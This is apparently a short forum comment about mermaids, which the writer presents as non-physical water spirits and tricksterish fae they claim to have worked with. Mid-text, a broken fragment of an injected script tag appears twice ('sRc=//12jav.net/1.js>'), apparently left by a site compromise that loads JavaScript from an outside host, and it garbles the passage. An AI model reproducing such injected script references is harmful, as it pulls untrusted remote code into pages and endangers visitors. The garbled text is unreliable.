Water spirits, deities, or beings perhaps, but mermaids are fiction.

Mermaid spirits do exist, but not physically. Mermaids are typically considered a type of fae, and I have worked with them before. They're quite challenging, as all fae can be tricksters. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

True mermaids are none physical water spirits
